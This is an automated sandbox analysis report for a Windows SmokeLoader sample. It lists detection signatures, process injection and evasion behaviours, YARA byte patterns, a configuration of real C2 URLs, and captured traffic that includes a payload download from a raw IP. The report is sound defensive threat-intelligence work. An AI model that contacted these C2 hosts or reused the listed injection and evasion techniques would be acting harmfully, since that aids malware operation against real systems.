Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:756294
MD5:1cf06beb83d2bd1afd1b9b62994e7549
SHA1:88bd7da7668fb669b5503696ee0a9c0f2dbeceb7
SHA256:4dc0de570728f75f844c7afb84ac6c809ef4620dac3b12a884ff9916f5b5b0ee
Tags:exeSmokeLoader
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Maps a DLL or memory area into another process
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Yara detected Keylogger Generic
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • file.exe (PID: 5200 cmdline: C:\Users\user\Desktop\file.exe MD5: 1CF06BEB83D2BD1AFD1B9B62994E7549)
    • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • ADCA.exe (PID: 1432 cmdline: C:\Users\user\AppData\Local\Temp\ADCA.exe MD5: 2479739C5D062ECB325147623241F007)
        • rundll32.exe (PID: 4912 cmdline: C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • WerFault.exe (PID: 4872 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
          • WerFault.exe (PID: 3808 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • 5AF.exe (PID: 5580 cmdline: C:\Users\user\AppData\Local\Temp\5AF.exe MD5: C81AB83835C2669DBE57C43DB54571B7)
  • dfhwrav (PID: 5440 cmdline: C:\Users\user\AppData\Roaming\dfhwrav MD5: 1CF06BEB83D2BD1AFD1B9B62994E7549)
  • 5AF.exe (PID: 2388 cmdline: "C:\Users\user\AppData\Local\Temp\5AF.exe" MD5: C81AB83835C2669DBE57C43DB54571B7)
  • cleanup
{"C2 list": ["http://piratia.su/tmp/", "http://dowe.at/tmp/", "http://xisac.com/tmp/", "http://newhorizonswv.com/tmp/", "http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/"]}
SourceRuleDescriptionAuthorStrings
00000010.00000002.491008397.00000000005E9000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0xff0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x744:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x344:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      Click to see the 20 entries
      SourceRuleDescriptionAuthorStrings
      0.2.file.exe.2070e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        0.2.file.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          9.3.dfhwrav.2080000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            9.2.dfhwrav.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              9.2.dfhwrav.6d0e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                Click to see the 5 entries
                No Sigma rule has matched
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: file.exeVirustotal: Detection: 33%Perma Link
                Source: http://piratia.su/tmp/URL Reputation: Label: malware
                Source: http://piratia.su/tmp/URL Reputation: Label: malware
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\dfhwravJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\5AF.exeJoe Sandbox ML: detected
                Source: 22.2.5AF.exe.23be12c.2.unpackAvira: Label: TR/Patched.Ren.Gen7
                Source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://piratia.su/tmp/", "http://dowe.at/tmp/", "http://xisac.com/tmp/", "http://newhorizonswv.com/tmp/", "http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/"]}
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_00878884 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_00881940 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_0087885C CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_008799FF CryptDestroyHash,
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_0087A511 CryptReleaseContext,
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_00884967 CryptReleaseContext,
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_00883F6C CryptDestroyHash,

                Exploits

                barindex
                Source: Yara matchFile source: 16.2.5AF.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.2.5AF.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000016.00000002.517229882.0000000000413000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.486093572.0000000000413000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY

                Compliance

                barindex
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeUnpacked PE file: 10.2.ADCA.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\5AF.exeUnpacked PE file: 16.2.5AF.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\5AF.exeUnpacked PE file: 22.2.5AF.exe.400000.0.unpack
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                Source: unknownHTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.6:49739 version: TLS 1.2
                Source: Binary string: setupapi.pdbf source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, 5AF.exe, 00000016.00000002.522529716.00000000023B8000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: cryptbase.pdbD source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: shcore.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\dohaf\kaxidin\wukoni\wefof\nojeyuve jucahazetozep zisasime.pdb0f source: 5AF.exe, 00000010.00000000.456599162.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000000.482478776.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
                Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: fltLib.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: shell32.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msctf.pdby source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: comctl32v582.pdbB source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wsspicli.pdb6 source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: fltLib.pdbR source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: mpr.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mpr.pdbA source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: sechost.pdb0 source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: setupapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Qrundll32.pdb source: WerFault.exe, 00000013.00000003.506255817.0000000004740000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.489353790.000000000473F000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.494807738.000000000473F000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: Qrundll32.pdb^t source: WerFault.exe, 00000013.00000003.527460296.0000000004740000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.527287787.0000000004740000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: shcore.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: 5AF.exe, 00000010.00000002.485930859.0000000000410000.00000040.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000002.517131758.0000000000410000.00000040.00000001.01000000.0000000B.sdmp
                Source: Binary string: C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb source: ADCA.exe, 0000000A.00000000.410105733.0000000000401000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: profapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: winspool.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: iphlpapi.pdbz source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: shell32.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sechost.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: combase.pdbt source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: 5C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb0f source: ADCA.exe, 0000000A.00000000.410105733.0000000000401000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: propsys.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: powrprof.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msctf.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\yepiro_lafonu\vekamogudit62\deney\jef.pdb source: file.exe, 00000000.00000000.243494837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, dfhwrav, 00000009.00000000.369163815.0000000000401000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: ole32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: version.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: propsys.pdb` source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sfc.pdbB source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: oleaut32.pdbl source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: IC:\yepiro_lafonu\vekamogudit62\deney\jef.pdb0f source: file.exe, 00000000.00000000.243494837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, dfhwrav, 00000009.00000000.369163815.0000000000401000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: advapi32.pdbJ source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: netapi32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: combase.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, 5AF.exe, 00000016.00000002.522529716.00000000023B8000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: rundll32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sfc.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: powrprof.pdbX source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: apphelp.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\dohaf\kaxidin\wukoni\wefof\nojeyuve jucahazetozep zisasime.pdb source: 5AF.exe, 00000010.00000000.456599162.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000000.482478776.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
                Source: Binary string: wuser32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: profapi.pdb^ source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: netutils.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: netapi32.pdbk source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_0040D450 FindFirstFileW,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_004235B0 FindFirstFileW,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_0040CE84 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,

                Networking

                barindex
                Source: C:\Windows\explorer.exeDomain query: thepokeway.nl
                Source: C:\Windows\explorer.exeNetwork Connect: 123.253.32.170 80
                Source: C:\Windows\explorer.exeDomain query: dowe.at
                Source: Malware configuration extractorURLs: http://piratia.su/tmp/
                Source: Malware configuration extractorURLs: http://dowe.at/tmp/
                Source: Malware configuration extractorURLs: http://xisac.com/tmp/
                Source: Malware configuration extractorURLs: http://newhorizonswv.com/tmp/
                Source: Malware configuration extractorURLs: http://cracker.biz/tmp/
                Source: Malware configuration extractorURLs: http://piratia-life.ru/tmp/
                Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                Source: Joe Sandbox ViewIP Address: 5.135.247.111 5.135.247.111
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.2Date: Tue, 29 Nov 2022 23:11:06 GMTContent-Type: application/octet-streamContent-Length: 3776000Last-Modified: Tue, 29 Nov 2022 23:10:03 GMTConnection: keep-aliveETag: "6386914b-399e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 71 fa 27 a0 35 9b 49 f3 35 9b 49 f3 35 9b 49 f3 88 d4 df f3 34 9b 49 f3 2b c9 dc f3 24 9b 49 f3 2b c9 ca f3 5d 9b 49 f3 12 5d 32 f3 32 9b 49 f3 35 9b 48 f3 af 9b 49 f3 2b c9 cd f3 17 9b 49 f3 2b c9 dd f3 34 9b 49 f3 2b c9 d8 f3 34 9b 49 f3 52 69 63 68 35 9b 49 f3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a2 ac e5 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 08 01 00 00 02 3c 00 00 00 00 00 97 4c 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 4f 00 00 04 00 00 01 9d 3a 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c 0a 01 00 50 00 00 00 00 c0 3c 00 50 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 2d 00 00 18 00 00 00 d8 2c 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 07 01 00 00 10 00 00 00 08 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 97 3b 00 00 20 01 00 00 60 38 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 50 12 00 00 c0 3c 00 00 32 00 00 00 6c 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: GET /upload/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: thepokeway.nl
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tajcoxqjmd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://owxfgf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dqkjujneki.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yfupv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lawtvrqx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: dowe.at
                Source: global trafficHTTP traffic detected: GET /root2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 123.253.32.170
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://frwum.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: dowe.at
